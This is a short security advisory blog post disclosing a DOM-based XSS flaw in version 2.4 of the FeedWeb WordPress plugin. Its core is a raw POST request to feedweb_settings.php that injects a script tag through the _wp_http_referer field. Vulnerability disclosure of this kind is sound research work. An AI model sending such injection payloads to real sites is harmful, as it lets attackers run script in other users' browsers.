Tuesday 25 February 2014

[EN] Wordpress plugin FeedWeb vulnerable to XSS

# ==============================================================
# Title ...| DOM-based XSS in FeedWeb
# Version .| feedweb.2.4
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.wordpress.org/plugins/
# ==============================================================


# ==============================================================
# DOM-based XSS

---<request>---
POST /k/wordpress/wp-content/plugins/feedweb/feedweb_settings.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 666

_wp_http_referer=";</script><script>alert(123)</script>&DelayResults=0&FeedwebLanguage=en&FeedwebMPWidgets=0&RatingWidgetType=H&AutoAddParagraphs=0&InsertWidgetPrompt=1&RatingWidgetLayout=wide&RatingWidgetPlacement=0&RatingWidgetColorScheme=gray&FrontWidgetItemCount=&ResultsBeforeVoting=0&FeedwebCopyrightNotice=0&FrontWidgetHideScroll=0&FrontWidgetColorScheme=classic&WidgetPlaceRadio=on&WidgetTypeSwitch=-&RatingWidgetColorSchemeBox=gray&ExternalBackgroundBox=FFFFFF&WidgetLanguageBox=en&WidgetLayoutBox=wide&WidgetWidthEdit=400&DelayResultsBox=0&WidgetPromptBox=on&FrontWidgetColorSchemeBox=classic&FrontWidgetHeightEdit=400&ItemCountBox=3&submit=Save+Changes
---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a Comment

What do You think...?